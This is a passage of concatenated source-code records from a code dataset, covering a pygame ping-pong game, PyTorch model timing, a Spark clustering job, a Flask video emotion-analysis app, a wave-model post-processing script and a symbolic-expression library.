rotations) % 4]\n elif d == 'F':\n y += n * direction[0]\n x += n * direction[1]\n else:\n raise NotImplementedError\n\n return abs(x) + abs(y)\n\n\nSAMPLE = '''\\\nF10\nN3\nF7\nR90\nF11\n'''\n\n\n@pytest.mark.parametrize(\n ('input_s', 'expected'),\n (\n (SAMPLE, 25),\n ),\n)\ndef test(input_s: str, expected: int) -> None:\n assert compute(input_s) == expected\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument('data_file', nargs='?', default=INPUT_TXT)\n args = parser.parse_args()\n\n with open(args.data_file) as f, timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n","sub_path":"day12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"490228541","text":"import pygame\nimport random\nfrom pingpong.settings import SCREEN_WIDTH, SCREEN_HEIGHT, BALL_YSPEED_INCREASE, BALL_YSPEED_MAX, BALL_YSPEED_START, RACKET_SPEED, RACKET_WIDTH_START, RACKET_WIDTH_MIN, RACKET_WIDTH_DECREASE\nfrom pygame.locals import (\n RLEACCEL,\n K_LEFT,\n K_RIGHT,\n) \n\nFIGPATH = \"pingpong/figs/\"\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n super(Player, self).__init__()\n self.racket_width = RACKET_WIDTH_START\n self.surf = pygame.Surface((self.racket_width, 20))\n self.surf.fill((255, 255, 255))\n self.rect = self.surf.get_rect(\n center=(\n SCREEN_WIDTH/2,\n SCREEN_HEIGHT,\n )\n )\n self.speed = RACKET_SPEED\n\n # Move the sprite based on user keypresses\n def update(self, pressed_keys):\n if pressed_keys[K_LEFT]:\n self.rect.move_ip(-self.speed, 0)\n if pressed_keys[K_RIGHT]:\n self.rect.move_ip(self.speed, 0)\n\n # Keep player on the screen\n # if self.rect.left < 0:\n # self.rect.left = 0\n # if self.rect.right > SCREEN_WIDTH:\n # self.rect.right = SCREEN_WIDTH\n \n \n def updateRL(self, action):\n if action == 0: #left\n self.rect.move_ip(-self.speed, 0)\n elif action == 1: #right\n self.rect.move_ip(self.speed, 0)\n #else:\n\n\n # Keep player on the screen\n if self.rect.left < 0:\n self.rect.left = 0\n if self.rect.right > SCREEN_WIDTH:\n self.rect.right = SCREEN_WIDTH\n\n def update_racket(self):\n x_pos = self.rect.centerx\n self.racket_width = self.racket_width*RACKET_WIDTH_DECREASE if self.racket_width > RACKET_WIDTH_MIN else RACKET_WIDTH_MIN\n self.surf = pygame.Surface((self.racket_width, 20))\n self.surf.fill((255, 255, 255))\n self.rect = self.surf.get_rect(\n center=(\n x_pos,\n SCREEN_HEIGHT,\n )\n )\n\n \n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self):\n super(Ball, self).__init__()\n self.surf = pygame.Surface((20, 20))\n self.surf.fill((255, 255, 255))\n self.rect = self.surf.get_rect(\n center=(\n SCREEN_WIDTH/2,\n 10,\n )\n )\n self.xspeed = random.randint(3,10)\n self.yspeed = BALL_YSPEED_START\n\n # Move the sprite based on speed\n # Remove the sprite when it passes the left edge of the screen\n def update(self):\n if self.rect.left < 0:\n self.xspeed *= -1\n if self.rect.right > SCREEN_WIDTH:\n self.xspeed *= -1\n if self.rect.top < 0:\n self.yspeed *= -1\n if self.rect.bottom > SCREEN_HEIGHT:\n return True\n\n self.rect.move_ip(self.xspeed, self.yspeed)\n return False\n\n def pong(self):\n self.yspeed *= -BALL_YSPEED_INCREASE\n if self.yspeed > BALL_YSPEED_MAX:\n self.yspeed = BALL_YSPEED_MAX\n\n # if random.randint(0,1) == 0:\n # self.xspeed += -1\n # else:\n # self.xspeed += 1\n\n # if self.xspeed > 20:\n # self.xspeed = 20\n # elif self.xspeed < -20:\n # self.xspeed = -20\n\n\nclass Score(pygame.sprite.Sprite):\n def __init__(self):\n super(Score, self).__init__()\n self.myFont = pygame.font.Font(f\"{FIGPATH}AtariClassic.ttf\", 30)\n self.white = (255,255,255)\n self.score = 0\n ### pass a string to myFont.render\n self.surf = self.myFont.render(f\"score: {self.score}\", 1, self.white)\n self.rect = self.surf.get_rect(left=10, top=10)\n \n\n def update(self):\n self.score += 1\n self.surf = self.myFont.render(f\"score: {self.score}\", 1, self.white)\n self.rect = self.surf.get_rect(left=10, top=10)\n","sub_path":"pingpong/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"510579937","text":"import BinModel\nimport NormBinModel\nimport NonBinModel\nfrom torch.autograd import Variable\nimport torch\nimport time\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\n\nbatches = 128\niter = 390\ntotal_time = 0\ntimes = 100\n\ndevice = torch.device('cuda:0')\n\ntransform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n])\nprint('==> Preparing data..')\ntestset = torchvision.datasets.CIFAR10(root='/export/livia/data/xxu/CIFAR10', train=False, download=False, transform=transform_test)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=0)\n\n\nprint('==> Building model..')\nnonBinModel = NonBinModel.NonBinModel()\nnonBinModel = nn.DataParallel(nonBinModel)\nnonBinModel.to(device)\nnonBinModel.eval()\nprint('==> Evaluating..')\nstart1 = time.time()\nfor epoch in range(times):\n with torch.no_grad():\n start = time.time()\n for batch_index, (inputs, targets) in enumerate(testloader):\n inputs = inputs.to(device)\n inputs = Variable(inputs)\n outputs = nonBinModel(inputs)\n end = time.time() - start\n print('Epoch: %d || Time: %f' % (epoch, end))\n total_time += end\ntorch.cuda.synchronize()\nprint('None Binarized Model Time: %f' % (total_time / 100))\n\nprint('==> Building model..')\nnormBinModel = NormBinModel.NormBinModel()\nnormBinModel = nn.DataParallel(normBinModel)\nnormBinModel.to(device)\nnormBinModel.eval()\nprint('==> Evaluating..')\nstart2 = time.time()\nfor epoch in range(times):\n start = time.time()\n with torch.no_grad():\n for batch_index, (inputs, targets) in enumerate(testloader):\n inputs = inputs.to(device)\n inputs = Variable(inputs)\n outputs = normBinModel(inputs)\n end = time.time() - start\n print('Epoch: %d || Time: %f' % (epoch, end))\n total_time += end\ntorch.cuda.synchronize()\nprint('Normal Binarized Model Time: %f' % (total_time / 100))\n\nprint('==> Building model..')\nbinModel = BinModel.BinModel()\nbinModel = nn.DataParallel(binModel)\nbinModel.to(device)\nbinModel.eval()\nprint('==> Evaluating..')\nfor epoch in range(times):\n start = time.time()\n with torch.no_grad():\n for batch_index, (inputs, targets) in enumerate(testloader):\n inputs= inputs.to(device)\n inputs = Variable(inputs)\n outputs = binModel(inputs)\n end = time.time() - start\n print('Epoch: %d || Time: %f' % (epoch, end))\n total_time += end\ntorch.cuda.synchronize()\nprint('Adapted Binarized Model Time: %f' % (total_time / 100))\n\n","sub_path":"GPU/TimeTest.py","file_name":"TimeTest.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196935039","text":"\"\"\"\r\n841 Keys and Rooms\r\n\r\nThere are N rooms and you start in room 0. Each room has a distinct number in 0, 1, 2, ..., N-1, and each room may have some keys to access the next room. \r\n\r\nFormally, each room i has a list of keys rooms[i], and each key rooms[i][j] is an integer in [0, 1, ..., N-1] where N = rooms.length. A key rooms[i][j] = v opens the room with number v.\r\n\r\nInitially, all the rooms start locked (except for room 0). \r\n\r\nYou can walk back and forth between rooms freely.\r\n\r\nReturn true if and only if you can enter every room.\r\n\r\nExample 1:\r\n\r\nInput: [[1],[2],[3],[]]\r\nOutput: true\r\nExplanation: \r\nWe start in room 0, and pick up key 1.\r\nWe then go to room 1, and pick up key 2.\r\nWe then go to room 2, and pick up key 3.\r\nWe then go to room 3. Since we were able to go to every room, we return true.\r\nExample 2:\r\n\r\nInput: [[1,3],[3,0,1],[2],[0]]\r\nOutput: false\r\nExplanation: We can't enter the room with number 2.\r\nNote:\r\n\r\n1 <= rooms.length <= 1000\r\n0 <= rooms[i].length <= 1000\r\nThe number of keys in all rooms combined is at most 3000.\r\n\"\"\"\r\nfrom collections import deque\r\nclass Solution:\r\n # my own BFS solution\r\n def canVisitAllRooms(self, rooms):\r\n \"\"\"\r\n :type rooms: List[List[int]]\r\n :rtype: bool\r\n \"\"\"\r\n N = len(rooms)\r\n color = [0]*N # 0: white, 1: gray, 2: black\r\n color[0] = 1\r\n\r\n q = deque([0])\r\n while q:\r\n u = q.popleft()\r\n for v in rooms[u]:\r\n if color[v] == 0:\r\n color[v] = 1\r\n q.append(v)\r\n \r\n color[u] = 2\r\n \r\n return all(value == 2 for value in color)\r\n\r\n#rooms = [[1],[2],[3],[]]\r\nrooms = [[1,3],[3,0,1],[2],[0]]\r\nprint(Solution().canVisitAllRooms(rooms))","sub_path":"code841KeysAndRooms.py","file_name":"code841KeysAndRooms.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"539014505","text":"#!/usr/bin/env python\n# coding: utf-8\n# author: map Karthik\n\n\n\nimport sys\nfrom pyspark import SparkConf, SparkContext, SQLContext\nfrom pyspark.mllib.clustering import PowerIterationClustering, PowerIterationClusteringModel\nimport os\nimport traceback\n\n# initializing spark\nconf = SparkConf()\nsc = SparkContext.getOrCreate(conf=conf)\nsqlCon = SQLContext(sc)\n#directory settings\nbase_folder = os.path.abspath(\"..\")\nraw_folder = os.path.join(base_folder,\"data/\")\ndat_folder = os.path.join(base_folder,\"src/\")\npreprocessed_folder = os.path.join(base_folder,\"preprocessed/\")\nresults_folder = os.path.join(base_folder,\"results/\")\n\nprint(\"Starting to read the file...\")\n# reading from the graph_sims file\ndata = sc.textFile(preprocessed_folder+'adjacency_graph_final_data.csv')\nheader = data.first()\n\nprint(\"File Read...\\n\")\n#mapper to convert data into required form RDD(long,long,double)\ndef initialProcess(lines):\n x= lines.split(',')\n x = (int(x[0]),int(x[1]),float(x[2]))\n return x\n\n#filtering out the header\nsims=data.filter(lambda x: x!=header).map(initialProcess)\n\nsims.cache()\n\nprint(\"simRDD cached...\\n\")\nnum_iterations = [35,50,60]\n\nfor num in num_iterations:\n \n try:\n \n # PIC(RDD,num_clusters,num_iterations) defaults: num_iterations=100\n\t# train(rdd,k,maxiterations)\n model = PowerIterationClustering.train(sims,100,num)\n\n print(\"model trained\\t num_iterations:\"+str(num)+\"\\n\")\n #Saving Clusters\n clusters = model.assignments()\n clustRDD = clusters.map(lambda x: (x.id,x.cluster))\n clust_df = clustRDD.toDF()\n\n clust_df.write.csv(results_folder + 'clusters_'+str(num),header = 'true')\n print(\"csv for {} iterations written\".format(num))\n except Exception:\n log = open(\"exception.log\",\"w+\")\n traceback.print_exc(file=log)\n\nprint(\"**************Complete****************\")\n#clust_df = clust_df.rename(columns={'_1':'NodeID','_2':'Cluster'})\n#clust_df.to_csv('clusters.csv',index=False)\n\n\n\n\n\n\n","sub_path":"src/pic_clustering.py","file_name":"pic_clustering.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"508387506","text":"import asyncio\n\nfrom ._parse import parse\nfrom .client import Client\nfrom .cluster import Cluster\nfrom .errors import BalancerManagerError\nfrom .helpers import find_object\n\n\nclass BalancerManager(object):\n def __init__(self, client):\n if isinstance(client, Client):\n self.client = client\n elif isinstance(client, dict):\n self.client = Client(**client)\n else:\n raise TypeError('client arg must be either py_balancer_manager.Client object or dict')\n\n self.httpd_version = None\n self.httpd_compile_date = None\n self.openssl_version = None\n self.clusters = list()\n self.date = None\n\n def __repr__(self):\n return f''\n\n @property\n def holistic_error_status(self):\n for cluster in self.clusters:\n # if self.holistic_error_status is True:\n # return False\n for route in cluster.routes:\n if route._status.error.value is True:\n return True\n return False\n\n def new_cluster(self, name):\n cluster = Cluster(self, name)\n self.clusters.append(cluster)\n return cluster\n\n def cluster(self, name):\n try:\n return find_object(self.clusters, 'name', name)\n except ValueError:\n raise BalancerManagerError(f'could not locate cluster name in list of clusters: {name}')\n\n async def update(self, response_payload=None):\n loop = asyncio.get_running_loop()\n if response_payload is None:\n async with self.client:\n response_payload = await self.client.get()\n await loop.run_in_executor(None, parse, response_payload, self)\n return self\n","sub_path":"py_balancer_manager/balancer_manager.py","file_name":"balancer_manager.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"330013544","text":"import sys\nimport math\nimport string\nfrom decimal import *\nimport operator\n\n#容忍 用来限制迭代次数\nrongren = 4E-20\n\n#accu 确定精确度\n\n#统计每个数字出现的次数\ndef fun1(x):\n num = []\n dic = {}\n for i in x:\n if i in dic:\n continue\n else:\n dic[i] = x.count(i)\n #对key的值排序,得到list,list转dict\n sorted_key_list=sorted(dic.items(),key=operator.itemgetter(0))\n\n sort_dic = dict(sorted_key_list)\n\n #打印排序之后的字典\n for key,value in sort_dic.items():\n print('{key}:{value}'.format(key = key ,value = value))\n\n #批量注释 ctrl+/\n # print('0:',dic['0'])\n # print('1:', dic['1'])\n # print('2:', dic['2'])\n # print('3:', dic['3'])\n # print('4:', dic['4'])\n # print('5:', dic['5'])\n # print('6:', dic['6'])\n # print('7:', dic['7'])\n # print('8:', dic['8'])\n # print('9:', dic['9'])\n\n\n#n为数列的某一项\ndef bbp(n):\n\n pi = Decimal(0)\n k = 0\n while k')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload():\n global current_df, current_video, graph\n app.logger.info(\"/upload accessed\")\n if request.method == 'POST':\n preview = False\n # check if the post request has the file part\n file = request.files.get('files[]')\n app.logger.info(\"{} - File received\".format(file.filename))\n if not file:\n # flash('No file part', category=\"Error\")\n app.logger.error('No file part')\n return redirect(request.url)\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n # flash('No selected file', category=\"Error\")\n return redirect(request.url)\n elif file and not allowed_file(file.filename):\n flash('Filename {} not allowed. Try with mp4 files'.format(\n file.filename))\n elif file and allowed_file(file.filename):\n session.clear()\n filename = secure_filename(file.filename)\n session['complete_video'] = request.files.get(\n 'completeVideo', False)\n mp4path = to_uploads(filename)\n file.save(mp4path)\n app.logger.info(\"Saved to {}\".format(mp4path))\n current_video = load_video(mp4path)\n screenshot = get_frame(current_video, encoding='opencv')\n cv2.imwrite(to_uploads('screenshot.png'), screenshot)\n session['screenshot'] = 'screenshot.png'\n session['filename'] = filename\n session['loaded'] = True\n results = analyze()\n return results\n # response = None\n # if analyze_response.status == 200:\n # # return redirect('/')\n # response = app.response_class(\n # response=json.dumps(session),\n # status=200,\n # mimetype='application/json'\n # )\n # app.logger.info(\"prepared response\")\n # else:\n # app.logger.error(analyze_response)\n # return response\n app.logger.error(\"Error with analysis\")\n return False\n # return redirect(url_for('analyze'))\n\n\ndef remove_frames(folder):\n files = glob.glob(os.path.join(folder, 'frame*.jpg'))\n for file in files:\n os.remove(file)\n\n\n@app.route('/analyze', methods=['GET'])\ndef analyze():\n \"\"\"Process analyze request.\"\"\"\n global current_df, current_video, graph\n results = []\n output = {}\n # Remove previous frames\n remove_frames(app.config['UPLOAD_FOLDER'])\n\n # Analyze video and save every nth frame\n try:\n assert current_video.cap.get(\n cv2.CAP_PROP_FRAME_HEIGHT) > 0, 'Video not loaded correctly'\n frequency = 1 if session['complete_video'] else 20\n app.logger.info(\"Analyzing every {} frame\".format(frequency))\n df = current_video.analyze(\n detector, display=False, frequency=frequency, output='pandas')\n if df.dropna().empty:\n # flash('No faces detected in sampled frames of {}'.format(current_video.filename()),'error')\n app.logger.error(\n 'No faces detected in sampled frames of {}'.format(\n current_video.filename()))\n return Response('Upload failed', status=300)\n elif len(df.dropna()) == 1:\n # flash('Only one of sample frames found with face - try another video.','error')\n app.logger.error(\n \"Only one sample frame found with face - try another video\")\n except AttributeError:\n app.logger.error('current_video is NoneType')\n return Response('Upload failed', status=500)\n root, ext = os.path.splitext(session.get('filename'))\n video_outfile = root + '_output' + ext\n\n if not os.path.isfile(to_uploads(video_outfile)):\n # flash('Video output.mp4 not found on server','error')\n app.logger.error(\"Video {} not found on server\".format(\n to_uploads(video_outfile)))\n session['video_filename'] = video_outfile\n current_df = current_video.get_first_face(df).dropna()\n csvpath = ''.join(session['filename'].split('.')[:-1]) + '.csv'\n csvpath = to_uploads(csvpath)\n current_df.to_csv(csvpath)\n session['csv_filename'] = os.path.split(csvpath)[1]\n session['dataframe'] = current_df.head(5).to_html(\n float_format=lambda x: '%.2f' % x, classes='mystyle')\n\n # session['dataframe'] = current_df.head(10).style.format('%.2f').render()\n session['output_images'] = get_output_images(current_video.outdir)\n emotions = current_video.get_emotions(current_df)\n try:\n emotions.plot()\n except TypeError:\n # flash('Empty DataFrame', 'error')\n app.logger.error(\"Empty dataframe\")\n return False\n emotions_chart = to_uploads('emotions_chart.png')\n plt.savefig(emotions_chart)\n session['emotions_chart'] = 'emotions_chart.png'\n session['explore'] = True\n result = jsonify({\n 'files': [{\n 'url': (f'uploads/{video_outfile}'),\n 'name': session['filename'],\n 'screenshots': session.get('output_images'),\n 'plot_url': 'uploads/' + session.get('emotions_chart'),\n 'dataframe': session.get('dataframe')\n }]\n })\n return result\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n global current_df, current_video, graph\n return render_template('index.html', **session)\n\n\n@app.after_request\ndef add_header(response):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n response.headers['Cache-Control'] = 'public, max-age=0'\n return response\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\nelse:\n gunicorn_logger = logging.getLogger('gunicorn.error')\n app.logger.handlers = gunicorn_logger.handlers\n app.logger.setLevel(gunicorn_logger.level)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"521729881","text":"import subprocess\nimport os\nimport glob\nimport yaml\nimport pprint\nimport ww3_log\nimport datetime\n\npwd = os.getcwd()\n\n# Output type options\nout_types = {'wave':{'type':'2','prefix':'ww3.','subtype':'2'}, # mean wave parameters \n 'met': {'type':'2','prefix':'cfsr.','subtype':'1'}, # depth, current, wind\n 'spec':{'type':'1','prefix':'spec.','subtype':'3'}} \n###################################################################################################\n###################################################################################################\n\ndef replace_ww3_ounp_inp_line(comment,opt1,opt2=None,opt3=None,opt4=None):\n\n # Find the requested line (nline) in the ww3_ounp input file\n founp = open(pwd+'/ww3_ounp.inp','r')\n lines = founp.read().splitlines()\n for n,line in enumerate(lines):\n if line.find(comment) > 0:\n break\n n = n+1\n \n # Replace the line with the new information (opt1 and opt2) \n line_info = lines[n].split()\n line_info[0] = opt1\n if opt2:\n line_info[1] = opt2\n if opt3:\n line_info[2] = opt3\n if opt4:\n line_info[3] = opt4\n lines[n] = ' '+' '.join(line_info)\n founp.close()\n \n # Re-write the ww3_ounp input file\n founp = open(pwd+'/ww3_ounp.inp','w')\n founp.write('\\n'.join(lines))\n founp.close()\n\n###################################################################################################\n###################################################################################################\n\nif __name__ == '__main__':\n\n f = open(pwd+'/process_points.config')\n cfg = yaml.load(f,yaml.Loader)\n pprint.pprint(cfg)\n\n # Check if the ww3_ounp input file exists\n if not os.path.isfile(pwd+'/ww3_ounp.inp'):\n print('ww3_ounp.inp not found')\n raise SystemExit(0)\n \n # Link the mod_def.ww3 file to the current directory\n subprocess.call(['ln','-sf',cfg['run_direc']+'mod_def.ww3',pwd])\n \n # Loop over all out_pnt.ww3.YYYYMMDD_HHMMSS-YYMMDD_HHMMSS files\n pnt_files = sorted(glob.glob(cfg['output_direc']+'out_pnt.ww3*'))\n log_files = sorted(glob.glob(cfg['log_direc']+'log.ww3*'))\n for i in range(len(pnt_files)):\n \n f = pnt_files[i]\n # Link the out_pnt.ww3 file to the current directory\n subprocess.call(['ln','-sf',f,pwd+'/out_pnt.ww3'])\n \n # Find the start and end dates from the filename\n date_range = f.split(\".\")[-1] \n start_date_time = date_range.split('-')[0]\n start_date = start_date_time.split('_')[0]\n start_time = start_date_time.split('_')[1]\n print(start_date,start_time)\n\n # Find output interval and number of outputs\n restart_output_times,gridded_output_times,point_output_times,start,end = ww3_log.find_output_times(log_files[i])\n noutputs = str(len(point_output_times))\n t0 = datetime.datetime.strptime(point_output_times[0],'%Y%m%d %H%M%S')\n t1 = datetime.datetime.strptime(point_output_times[1],'%Y%m%d %H%M%S')\n dt = t1-t0\n output_interval = int(dt.total_seconds())\n if output_interval < 3600:\n output_interval = 3600\n \n # Replace the time information line\n replace_ww3_ounp_inp_line('start date',start_date,start_time,str(output_interval),noutputs)\n\n for out_type in cfg['out_types']:\n\n otype = out_types[out_type]\n \n # Replace the output type information lines\n replace_ww3_ounp_inp_line('file prefix' ,otype['prefix'])\n replace_ww3_ounp_inp_line('output type' ,otype['type'])\n replace_ww3_ounp_inp_line('sub-type',otype['subtype'])\n \n # Run the ww3_ounp program\n subprocess.call(['srun','-n','4',pwd+'/ww3_ounp'])\n \n # Move file to data directory\n if not os.path.exists(cfg['data_direc']):\n subprocess.call(['mkdir','-p',cfg['data_direc']])\n subprocess.call('mv *.nc '+cfg['data_direc'],shell=True)\n","sub_path":"post_processing/process_points.py","file_name":"process_points.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"88203845","text":"from functools import wraps\nimport numpy as np\nimport traceback\nfrom .constants import SIGN_LEVEL, SIGN_STR, OPERATOR, Ops\nimport itertools\nfrom collections import deque\nfrom collections import OrderedDict\nfrom abc import abstractmethod\nimport copy\n\n\nclass OperatorMetaclass(type):\n\n def __new__(cls, name, bases, attrs):\n target = ['__eq__', '__sub__', '__add__',\n '__mul__', '__truediv__', '__pow__', '__radd__', '__rsub__',\n '__rpow__', '__rtruediv__']\n\n if 'cast_other' in attrs and bases:\n cast_other = attrs['cast_other']\n for op in target:\n parents = [base.__mro__ for base in bases]\n parents = itertools.chain.from_iterable(parents)\n parent = [parent for parent in parents if parent == Operator]\n method = cast_other(getattr(parent[0], op))\n attrs[op] = method\n return type.__new__(cls, name, bases, attrs)\n\n\nclass Operator(metaclass = OperatorMetaclass):\n\n def __eq__(slef, other):\n\n return 'eq'\n\n def __add__(self, other):\n\n return 'add'\n\n def __radd__(self, other):\n\n return 'radd'\n\n def __sub__(self, other):\n\n return 'sub'\n\n def __rsub__(self, other):\n\n return 'rsub'\n\n def __mul__(self, other):\n\n return 'mul'\n\n\n def __rmul__(self, other):\n\n return 'rmul'\n\n def __truediv__(self, other):\n\n return 'div'\n\n def __rtruediv__(self, other):\n\n return 'rdiv'\n\n def __pow__(self, other):\n\n return 'pow'\n\n def __rpow__(self, other):\n\n return 'rpow'\n\n\n def cast_other(func):\n @wraps(f)\n def wrapper(self, other):\n\n v = func(self, other)\n\n return v\n\n return wrapper\n\n\nclass Base(Operator):\n\n def __init__(self):\n self.ops = []\n\n def add_ops(self, op):\n\n self.ops.append(op)\n\n def __neg__(self):\n expr = copy.deepcopy(self)\n expr.add_ops('neg')\n return expr\n\n @abstractmethod\n def val(self):\n\n raise NotImplementedError\n\n\nclass Expression(Base):\n\n\n def __init__(self, base_expression):\n\n self.base = base_expression\n self.vars = OrderedDict()\n if isinstance(base_expression, Variable):\n self.vars[str(base_expression)] = base_expression\n elif isinstance(base_expression, Expression):\n self.vars.update(base_expression.vars)\n\n self.nodes = []\n\n self.noises = OrderedDict()\n\n super(Expression, self).__init__()\n\n\n def append(self, atom, operator):\n node = {'op': operator, 'atom': atom}\n if isinstance(atom, Variable):\n self.vars[str(atom)] = atom\n elif isinstance(atom, Expression):\n self.vars.update(atom.vars)\n\n self.nodes.append(node)\n\n @property\n def val(self):\n\n value = self.base.val\n\n for index, node in enumerate(self.nodes):\n value = OPERATOR[node['op']](value, node['atom'].val)\n\n for op in self.ops:\n if op == 'exp':\n value = np.exp(value)\n elif op == 'log':\n value = np.log(value)\n else:\n value = OPERATOR[op](value)\n\n\n return value\n\n def gradient(self, varlist):\n\n if not isinstance(varlist, (list, tuple)):\n varlist = [varlist]\n\n grads = []\n\n for _, var in enumerate(varlist):\n expr = self.base.gradient(var)\n\n for op in self.ops:\n if op == 'exp':\n expr = Expression(self.base)\n expr.add_ops('exp')\n expr = expr * self.base.gradient(var)\n elif op == 'log':\n one = Constant('', 1)\n expr = (one / self.base) * self.base.gradient(var)\n elif op == 'neg':\n expr = -expr\n\n left = Expression(self.base)\n for _, node in enumerate(self.nodes):\n op = node['op']\n atom = node['atom']\n\n if op == Ops.ADD.value:\n expr = expr + atom.gradient(var)\n\n elif op == Ops.SUB.value:\n\n expr = expr - atom.gradient(var)\n\n elif op == Ops.MUL.value:\n expr = left * atom.gradient(var) + left.gradient(var)* atom\n\n elif op == Ops.DIV.value:\n one = Constant('', 1)\n expr = (one / self.base) * self.base.gradient(var)\n expr = left.gradient(var) * atom - atom.gradient(var) * left/ atom ** 2\n\n elif op == Ops.POW.value:\n\n lg_left = Expression(left)\n lg_left.add_ops('log')\n\n gd_lg_left = atom * lg_left\n\n expr = left ** atom * gd_lg_left.gradient(var)\n\n left = Expression(left)\n left.append(atom, op)\n\n grads.append(expr)\n\n if len(grads) == 1:\n return grads[0]\n else:\n return grads\n\n\n\n def __repr__(self):\n\n\n node_str = ''\n if self.val == 0:\n expr_str = ''\n else:\n expr_str = str(self.base)\n\n for index, node in enumerate(self.nodes):\n level = SIGN_LEVEL[node['op']]\n\n if(isinstance(node['atom'], Expression)):\n\n node_str = '(' + str(node['atom']) + ')'\n if (node['atom'].val == 0):\n node_str = ''\n elif(isinstance(node['atom'], (Parameter, Constant))):\n node_str = str(node['atom'])\n if node['atom'].val == 0:\n node_str = ''\n\n else:\n node_str = str(node['atom'])\n\n if node_str and expr_str:\n expr_str = expr_str + SIGN_STR[node['op']] + node_str\n elif node_str:\n expr_str = node_str\n\n for op in self.ops:\n if op == 'neg':\n expr_str = SIGN_STR[op] + '(' + expr_str + ')'\n elif op == 'exp':\n expr_str = 'exp(' + expr_str + ')'\n elif op == 'log':\n expr_str = 'log(' + expr_str + ')'\n return expr_str\n\n\n def cast_other(func):\n\n @wraps(func)\n def wrapper(instance, other):\n try:\n op = func(instance, other)\n except:\n traceback.print_exc()\n\n if op.startswith('r'):\n if isinstance(other, (int, float)):\n other = Constant('Constant', other)\n new_expr = Expression(other)\n new_expr.append(instance, op[1:])\n else:\n new_expr = Expression(instance) # self is the base atom\n if isinstance(other, (int, float)):\n other = Constant('Constant', other)\n new_expr.append(other, op)\n\n return new_expr\n\n return wrapper\n\n\n\nclass BaseAtom(Operator):\n def __init__(self, name, init):\n self._shape = None\n self._name = name\n self._val = init\n super(BaseAtom, self).__init__()\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, name):\n self._name = name\n\n @property\n def val(self):\n value = self._val\n\n return value\n\n @val.setter\n def val(self, value):\n\n if(isinstance(value, (list, tuple))):\n value = np.array(value)\n\n self._shape = value.shape\n self._val = value\n else:\n self._val = value\n\n\nclass Constant(BaseAtom):\n '''Constant is a special kind of Atom,\n which discribes the structure of\n of model.\n '''\n def __init__(self, name, val):\n super(Constant, self).__init__(name, val)\n\n\n def __repr__(self):\n return str(self.val)\n\n def gradient(self, var):\n\n return Constant('', 0)\n\n\n def cast_other(func):\n\n @wraps(func)\n def wrapper(instance, other):\n try:\n op = func(instance, other)\n except:\n traceback.print_exc()\n if op.startswith('r'):\n if isinstance(other, (int, float)):\n other = Constant('Constant', other)\n new_expr = Expression(other)\n new_expr.append(instance, op[1:])\n else:\n new_expr = Expression(instance) # self is the base atom\n if isinstance(other, (int, float)):\n other = Constant('Constant', other)\n new_expr.append(other, op)\n return new_expr\n\n return wrapper\n\n\nclass Atom(BaseAtom):\n\n\n def __init__(self, name, val, order=0):\n self._order = order\n super(Atom, self).__init__(name, val)\n\n\n @property\n def order(self):\n return self._order\n\n @order.setter\n def order(self, order):\n self._order = order\n\n\n def __str__(self):\n if self.name ==None:\n atom_str = str(self.val)\n\n if(self.order == 0):\n atom_str = self.name\n else:\n atom_str = self.name + '[' + str(self.order) + ']'\n\n\n return atom_str\n\n def __neg__(self):\n new_expr = Expression(self) # self is the base atom\n new_expr.add_ops('neg')\n\n def cast_other(func):\n\n @wraps(func)\n def wrapper(instance, other):\n try:\n op = func(instance, other)\n except:\n traceback.print_exc()\n\n if op.startswith('r'):\n if isinstance(other, (int, float)):\n other = Constant('Constant', other)\n new_expr = Expression(other)\n new_expr.append(instance, op[1:])\n else:\n new_expr = Expression(instance) # self is the base atom\n if isinstance(other, (int, float)):\n other = Constant('Constant', other)\n new_expr.append(other, op)\n\n return new_expr\n\n return wrapper\n\n\n def gradient(self, var):\n\n return Constant('', 0)\n\n\n\nclass Parameter(Atom):\n '''Parameter is a special kind of Atom,\n which represents the exogenious\n elements of an expression. They\n are un-optimizable in a model.\n '''\n def __init__(self, name, value):\n super(Parameter, self).__init__(name, value)\n\nclass Variable(Atom):\n '''Variable is a special kind of Atom,\n which represents the endogeneous\n elements of an expression. They\n are optimizable in a model.\n '''\n def __init__(self, name, init):\n super(Variable, self).__init__(name, init)\n\n\n def lag(self, order, init = None):\n '''Generate a new atom represents the lag of self by order'''\n 